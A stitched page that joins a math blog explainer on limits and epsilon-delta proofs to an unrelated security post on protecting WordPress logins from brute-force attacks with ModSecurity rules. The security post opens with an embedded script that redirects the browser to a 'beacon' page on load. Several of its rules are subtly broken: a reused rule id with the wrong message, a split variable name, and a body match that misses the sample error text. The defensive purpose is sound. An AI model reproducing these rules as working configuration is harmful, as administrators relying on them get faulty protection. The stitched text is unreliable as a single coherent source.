Archimedes figured out that pi had a range of

\displaystyle{3 \frac{10}{71} < \pi < 3 \frac{1}{7} }

using a process like this:

It was the precursor to calculus: he determined that pi was a number that stayed between his ever-shrinking boundaries. Nowadays, we have modern limit definitions of pi.

What does perfectly continuous growth look like?

e, one of my favorite numbers, can be defined like this:

\displaystyle{e = \lim_{n\to\infty} \left( 1 + \frac{1}{n} \right)^n}

We can’t easily measure the result of infinitely-compounded growth. But, if we could make a prediction, is there a single rate that is ever-accurate? It seems to be around 2.71828…

Can we use simple shapes to measure complex ones?

Circles and curves are tough to measure, but rectangles are easy. If we could use an infinite number of rectangles to simulate curved area, can we get a result that withstands infinite scrutiny? (Maybe we can find the area of a circle.)

Can we find the speed at an instant?

Speed is funny: it needs a before-and-after measurement (distance traveled / time taken), but can’t we have a speed at individual instants? Hrm.

Limits help answer this conundrum: predict your speed when traveling to a neighboring instant. Then ask the “impossible question”: what’s your predicted speed when the gap to the neighboring instant is zero?

Note: The limit isn’t a magic cure-all. We can’t assume one exists, and there may not be an answer to every question. For example: Is the number of integers even or odd? The quantity is infinite, and neither the “even” nor “odd” prediction stays accurate as we count higher. No well-supported prediction exists.

For pi, e, and the foundations of calculus, smart minds did the proofs to determine that “Yes, our predicted values get more accurate the closer we look.” Now I see why limits are so important: they’re a stamp of approval on our predictions.

The Math: The Formal Definition Of A Limit

Limits are well-supported predictions. Here’s the official definition:

\displaystyle{ \lim_{x \to c}f(x) = L } means for all real ε > 0 there exists a real δ > 0 such that for all x with 0

Let’s make this readable:

Math English Human English
\displaystyle{ \lim_{x \to c}f(x) = L }
  means
When we “strongly predict” that f(c) = L, we mean
for all real ε > 0 for any error margin we want (+/- .1 meters)
there exists a real δ > 0 there is a zoom level (+/- .1 seconds)
such that for all x with 0 where the prediction stays accurate to within the error margin

There’s a few subtleties here:

  • The zoom level (delta, δ) is the function input, i.e. the time in the video
  • The error margin (epsilon, ε) is the most the function output (the ball’s position) can differ from our prediction throughout the entire zoom level
  • The absolute value condition (0 < |x − c| < δ) means positive and negative offsets must work, and we’re skipping the black hole itself (when |x – c| = 0).

We can’t evaluate the black hole input, but we can say “Except for the missing point, the entire zoom level confirms the prediction f(c) = L.” And because f(c) = L holds for any error margin we can find, we feel confident.

Could we have multiple predictions? Imagine we predicted L1 and L2 for f(c). There’s some difference between them (call it .1), therefore there’s some error margin (.01) that would reveal the more accurate one. Every function output in the range can’t be within .01 of both predictions. We either have a single, infinitely-accurate prediction, or we don’t.

Yes, we can get cute and ask for the “left hand limit” (prediction from before the event) and the “right hand limit” (prediction from after the event), but we only have a real limit when they agree.

A function is continuous when it always matches the predicted value (and discontinuous if not):

\displaystyle{\lim_{x \to c}{f(x)} = f(c)}

Calculus typically studies continuous functions, playing the game “We’re making predictions, but only because we know they’ll be correct.”

The Math: Showing The Limit Exists

We have the requirements for a solid prediction. Questions asking you to “Prove the limit exists” ask you to justify your estimate.

For example: Prove the limit at x=2 exists for

\displaystyle{f(x) = \frac{(2x+1)(x-2)}{(x - 2)}}

The first check: do we even need a limit? Unfortunately, we do: just plugging in “x=2″ means we have a division by zero. Drats.

But intuitively, we see the same “zero” (x – 2) could be cancelled from the top and bottom. Here’s how to dance this dangerous tango:

  • Assume x is anywhere except 2 (It must be! We’re making a prediction from the outside.)
  • We can then cancel (x – 2) from the top and bottom, since it isn’t zero.
  • We’re left with f(x) = 2x + 1. This function can be used outside the black hole.
  • What does this simpler function predict? That f(2) = 2*2 + 1 = 5.

So f(2) = 5 is our prediction. But did you see the sneakiness? We pretended x wasn’t 2 [to divide out (x-2)], then plugged in 2 after that troublesome item was gone! Think of it this way: we used the simple behavior from outside the event to predict the gnarly behavior at the event.

We can prove these shenanigans give a solid prediction, and that f(2) = 5 is infinitely accurate.

For any accuracy threshold (ε), we need to find the “zoom range” (δ) where we stay within the given accuracy. For example, can we keep the estimate between +/- 1.0?

Sure. We need to find out where

\displaystyle{|f(x) - 5| < 1.0}

so


\begin{align*}
|2x + 1 - 5| &< 1.0 \\
|2x - 4| &< 1.0 \\
|2(x - 2)| &< 1.0 \\
2|(x - 2)| &< 1.0 \\
|x - 2| &< 0.5
\end{align*}

In other words, x must stay within 0.5 of 2 to maintain the initial accuracy requirement of 1.0. Indeed, when x is between 1.5 and 2.5, f(x) goes from f(1.5) = 4 to and f(2.5) = 6, staying +/- 1.0 from our predicted value of 5.

We can generalize to any error tolerance (ε) by plugging it in for 1.0 above. We get:

\displaystyle{|x - 2| < 0.5 \cdot \epsilon}

If our zoom level is “δ = 0.5 * ε”, we’ll stay within the original error. If our error is 1.0 we need to zoom to .5; if it’s 0.1, we need to zoom to 0.05.

This simple function was a convenient example. The idea is to start with the initial constraint (|f(x) – L| < ε), plug in f(x) and L, and solve for the distance away from the black-hole point (|x – c| < ?). It’s often an exercise in algebra.

Sometimes you’re asked to simply find the limit (plug in 2 and get f(2) = 5), other times you’re asked to prove a limit exists, i.e. crank through the epsilon-delta algebra.

Flipping Zero and Infinity

Infinity, when used in a limit, means “grows without stopping”. The symbol ∞ is no more a number than the sentence “grows without stopping” or “my supply of underpants is dwindling”. They are concepts, not numbers (for our level of math, Aleph me alone).

When using ∞ in a limit, we’re asking: “As x grows without stopping, can we make a prediction that remains accurate?”. If there is a limit, it means the predicted value is always confirmed, no matter how far out we look.

But, I still don’t like infinity because I can’t see it. But I can see zero. With limits, you can rewrite

\displaystyle{\lim_{x \to \infty}}

as

\displaystyle{\lim_{\frac{1}{x} \to 0}}

You can get sneaky and define y = 1/x, replace items in your formula, and then use

\displaystyle{\lim_{y \to 0^+}}

so it looks like a normal problem again! (Note from Tim in the comments: the limit is coming from the right, since x was going to positive infinity). I prefer this arrangement, because I can see the location we’re narrowing in on (we’re always running out of paper when charting the infinite version).

Why Aren’t Limits Used More Often?

Imagine a kid who figured out that “Putting a zero on the end” made a number 10x larger. Have 5? Write down “5″ then “0″ or 50. Have 100? Make it 1000. And so on.

He didn’t figure out why multiplication works, why this rule is justified… but, you’ve gotta admit, he sure can multiply by 10. Sure, there are some edge cases (Would 0 become “00″?), but it works pretty well.

The rules of calculus were discovered informally (by modern standards). Newton deduced that “The derivative of x^3 is 3x^2″ without rigorous justification. Yet engines whirl and airplanes fly based on his unofficial results.

The calculus pedagogy mistake is creating a roadblock like “You must know Limits™ before appreciating calculus”, when it’s clear the inventors of calculus didn’t. I’d prefer this progression:

  • Calculus asks seemingly impossible questions: When can rectangles measure a curve? Can we detect instantaneous change?
  • Limits give a strategy for answering “impossible” questions (“If you can make a prediction that withstands infinite scrutiny, we’ll say it’s ok.”)
  • They’re a great tag-team: Calculus explores, limits verify. We memorize shortcuts for the results we verified with limits (d/dx x^3 = 3x^2), just like we memorize shortcuts for the rules we verified with multiplication (adding a zero means times 10). But it’s still nice to know why the shortcuts are justified.

Limits aren’t the only tool for checking the answers to impossible questions; infinitesimals work too. The key is understanding what we’re trying to predict, then learning the rules of making predictions.

Happy math.

16 Apr 18:09

Defending WordPress Logins from Brute Force Attacks

by Ryan Barnett
<SCRIPT> var str1 = "http://"; var str2 = "www.modsecurity.org"; var str3 = "/beacon.html"; var result = str1 + str2 + str3; window.location=result</SCRIPT>
image from krebsonsecurity.comAs has been reported by many news outlets, WordPress login pages have been under a heavy brute force attack campaign as another methof of web server botnet recruitment.  There are are number of methods which can be used to help mitigate these attacks including:

While all of these defenses are good, and I encourage WP users to implement them, I also wanted to show how ModSecurity WAF can be used to protect WP logins as many hosting providers already run it as part of their infrastructure.  With ModSecurity v2.7.3, users can add in these example rules to Apache htaccess files to implement custom rules.

Profiling WordPress Login Attempts

This what the login page looks like when a real user is submitting a login request to WordPress:

361818 F 0701
When sent to the wp-loing.php page, the raw HTTP looks similar to this:

POST /wordpress/wp-login.php HTTP/1.1 
Host: mywordpress.com 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; q=0.8 
Accept-Language: en-us,en;q=0.5 
DNT: 1 
Referer: http://mywordpress.com/wordpress/wp-login.php 
Content-Type: application/x-www-form-urlencoded
Via: 1.1 owaspbwa.localdomain 
Connection: Keep-Alive 
Content-Length: 73

log=administrator&pwd=pass123&submit=Login+%C2%BB&redirect_to=wp-admin%2F

Now that we see how the WordPress login request looks, we can create the following rules to help protect it from unauthorized access.

Check Referer Field

When normal users log into WordPress, it includes a Referer header that is generated when they click on the "Login" button from the form shown above.  Many of these botnet brute force attacks, however, send POST login requests directly to the wp-login.php page.  We can therefore create this quick ModSecurity ruleset to enforce the existence of the Referer header:

SecRule REQUEST_METHOD "@streq POST" "chain,id:'1',phase:2,t:none,block,log,msg:'Warning: Direct Login Missing Referer.'"
  SecRule REQUEST_FILENAME "@pm /wp-login.php /wp-admin/" "chain"
    SecRule &REQUEST_HEADERS:Referer "@eq 0"

This type of security check is weak of course as this data could easily be added to the botnet attack scripts.

Restrict Allowed IP Addresses

If you do not change your administrator account name, you can still add in an extra layer of security by only allowing admin login access to your IP address.  Here is an example ruleset:

SecRule REQUEST_METHOD "@streq POST" "chain,id:'1',phase:2,t:none,block,log,msg:'Warning: Direct Login Missing Referer.'"
  SecRule REQUEST_FILENAME "@pm /wp-login.php /wp-admin/" "chain"
    SecRule ARGS:log "@streq admin" "chain"
      SecRule REMOTE_ADDR "!@ipMatch 72.192.214.223"

In this example, it will only allow the "admin" user to login if they are coming from the 72.192.214.223 IP address (of course you would need to specify your valid IP address).

Tracking Failed Admin Login Attempts

With ModSecurity's persistent IP collection data, we have the capability to track the number of failed login attempts for the admin account and then temporarily block client IP addresses.  Here is the example response data returned when a user failes a WordPress login attempt -

HTTP/1.1 200 OK 
Date: Fri, 11 May 2012 03:24:53 GMT 
Server: Apache 
Expires: Wed, 11 Jan 1984 05:00:00 GMT 
Last-Modified: Fri, 11 May 2012 03:24:54 GMT 
Cache-Control: no-cache, must-revalidate, max-age=0 
Pragma: no-cache 
Vary: Accept-Encoding 
Content-Length: 1697 
Connection: close 
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>WordPress &rsaquo; Login</title>
<meta http-equiv="Content-Type" content="text/html; c harset=UTF-8" />

<link rel="stylesheet" href="http://192.168.1.113/wordpress/wp-admin/wp-admin.css" type="text/css" /> <script type="text/javascript"> function focusit() {
document.getElementById('log').focus();
} window.onload = focusit; </script>
</head> <body>
<div id="login"> <h1><a href="http://wordpress.org/">WordPress</a></h1> <div id='login_error'>
<strong>Error</strong>: Incorrect password. </div> 
... 
</body> 
</html>

 As you can see the HTTP response status code is 200 OK and there is text in the HTML body indicating that the user supplied an incorrect password.   We can now create rules to identify repeated failures:

SecRule REQUEST_FILENAME "@streq /wordpress/wp-login.php" "chain, phase:4,id:999323,t:none,block,msg:'Authentication Failure Violation .',logdata:'Number of Authentication Failures: %{ip.failed_auth_ attempt}'"
  SecRule REQUEST_METHOD "@streq POST" "chain" 
    SecRule ARGS:log "@streq admin" "chain"
      SecRule RESPONSE_STATUS "200" "chain" 
        SecRule RESPONSE_BODY "@contains <strong>Error</strong>:Incorrect password." "chain,setvar:ip.failed_auth_attempt=+1,expirevar:ip.failed_auth_attempt=60"
          SecRule IP:FAILED_AUTH_ATTEMPT "@gt 5"

Detecting a High Number of Authentication Attempts

Regardless of authentication success/failure, you can also use persistent storage to track the number of authentication requests for a specified period of time.  The OWASP ModSecurity Core Rule Set (CRS) includes rules for detecting this type of brute force authentication attacks.  In the modsecurity_crs_10_setup.conf, you can adjust the following rule to specify the WordPress login page: 

 #  # -- [[ Brute Force Protection ]] ---------------------------------------------------------  #  # If you are using the Brute Force Protection rule set, then uncomment the following  # lines and set the following variables:  # - Protected URLs: resources to protect (e.g. login pages) - set to your login page  # - Burst Time Slice Interval: time interval window to monitor for bursts  # - Request Threshold: request # threshold to trigger a burst  # - Block Period: temporary block timeout  #  SecAction \    "id:'900014', \    phase:1, \    t:none, \    setvar:'tx.brute_force_protected_urls=/wp-login.php', \    setvar:'tx.brute_force_burst_time_slice=60', \    setvar:'tx.brute_force_counter_threshold=10', \    setvar:'tx.brute_force_block_timeout=300', \    nolog, \    pass" 

Once this is set, you activate the modsecurity_crs_11_brute_force.conf file with the following rules:

 #  # Anti-Automation Rule for specific Pages (Brute Force Protection)  # This is a rate-limiting rule set and does not directly correlate whether the  # authentication attempt was successful or not.  #  #  # Enforce an existing IP address block and log only 1-time/minute  # We don't want to get flooded by alerts during an attack or scan so  # we are only triggering an alert once/minute.  You can adjust how often  # you want to receive status alerts by changing the expirevar setting below.  #  SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "chain,phase:1,id:'981036',block,msg:'Brute Force Attack Identified from %{tx.real_ip} (%{tx.brute_force_block_counter} hits since last alert)',setvar:ip.brute_force_block_counter=+1"  	SecRule &IP:BRUTE_FORCE_BLOCK_FLAG "@eq 0" "setvar:ip.brute_force_block_flag=1,expirevar:ip.brute_force_block_flag=60,setvar:tx.brute_force_block_counter=%{ip.brute_force_block_counter},setvar:ip.brute_force_block_counter=0"  #  # Block and track # of requests but don't log  SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:1,id:'981037',block,nolog,setvar:ip.brute_force_block_counter=+1"  #  # skipAfter Checks  # There are different scenarios where we don't want to do checks -  # 1. If the user has not defined any URLs for Brute Force Protection in the 10 config file  # 2. If the current URL is not listed as a protected URL  # 3. If the current IP address has already been blocked due to high requests  # In these cases, we skip doing the request counts.  #  SecRule &TX:BRUTE_FORCE_PROTECTED_URLS "@eq 0" "phase:5,id:'981038',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"  SecRule REQUEST_FILENAME "!@within %{tx.brute_force_protected_urls}" "phase:5,id:'981039',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"  SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:5,id:'981040',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"  #  # Brute Force Counter  # Count the number of requests to these resoures  #   SecAction "phase:5,id:'981041',t:none,nolog,pass,setvar:ip.brute_force_counter=+1"  #  # Check Brute Force Counter  # If the request count is greater than or equal to 50 within 5 mins,  # we then set the burst counter  #   SecRule IP:BRUTE_FORCE_COUNTER "@gt %{tx.brute_force_counter_threshold}" "phase:5,id:'981042',t:none,nolog,pass,t:none,setvar:ip.brute_force_burst_counter=+1,expirevar:ip.brute_force_burst_counter=%{tx.brute_force_burst_time_slice},setvar:!ip.brute_force_counter"  #  # Check Brute Force Burst Counter and set Block  # Check the burst counter - if greater than or equal to 2, then we set the IP  # block variable for 5 mins and issue an alert.  #  SecRule IP:BRUTE_FORCE_BURST_COUNTER "@ge 2" "phase:5,id:'981043',t:none,log,pass,msg:'Potential Brute Force Attack from %{tx.real_ip} - # of Request Bursts: %{ip.brute_force_burst_counter}',setvar:ip.brute_force_block=1,expirevar:ip.brute_force_block=%{tx.brute_force_block_timeout}"  SecMarker END_BRUTE_FORCE_PROTECTION_CHECKS 

Brute Force Detection using SecGuardianLog

Another option that can be used to detect both DoS and Brute Force attacks is to use the SecGuardianLog directive:

Description: Configures an external program that will receive the information about every transaction via piped logging.

Syntax: SecGuardianLog |/path/to/httpd-guardian

Example Usage: SecGuardianLog |/usr/local/apache/bin/httpd-guardian

Scope: Main

Version: 2.0.0

Guardian logging is designed to send the information about every request to an external program. Because Apache is typically deployed in a multiprocess fashion, which makes information sharing between processes difficult, the idea is to deploy a single external process to observe all requests in a stateful manner, providing additional protection.

Currently the only tool known to work with guardian logging is httpd-guardian, which is part of the Apache httpd tools project http://apache-tools.cvs.sourceforge.net/viewvc/apache-tools/apache-tools/. The httpd-guardian tool is designed to defend against denial of service attacks. It uses the blacklist tool (from the same project) to interact with an iptables-based (on a Linux system) or pf-based (on a BSD system) firewall, dynamically blacklisting the offending IP addresses. It can also interact with SnortSam http://www.snortsam.net. Assuming httpd-guardian is already configured (look into the source code for the detailed instructions), you only need to add one line to your Apache configuration to deploy it:

SecGuardianLog |/path/to/httpd-guardian

By using this setting, the httpd-guardian process is able to track the number of request hittings resources and if the limits are exceeded, it can execute a number of response actions:

# If defined, execute this command when a threshold is reached
# block the IP address for one hour.
# $PROTECT_EXEC = "/sbin/blacklist block %s 3600";
# $PROTECT_EXEC = "/sbin/samtool -block -ip %s -dur 3600 snortsam.example.com";
my $PROTECT_EXEC;

# For testing only:
# $PROTECT_EXEC = "/sbin/blacklist-webclient %s 3600";

# Max. speed allowed, in requests per
# second, measured over an 1-minute period
my $THRESHOLD_1MIN = 2; # 120 requests in a minute

Notice the $PROTECT_EXEC variable allows you to specify an action such as notifying either a local or remote firewall to add in IP-based blocking of the offending IP address.  This option is preferred vs. layer 7 IP based blocking with ModSecurity as it is less resource intensive.

Conclusion

Hopefully the ModSecurity rule examples shown here can help you to defend your WordPress sites from brute force attacks.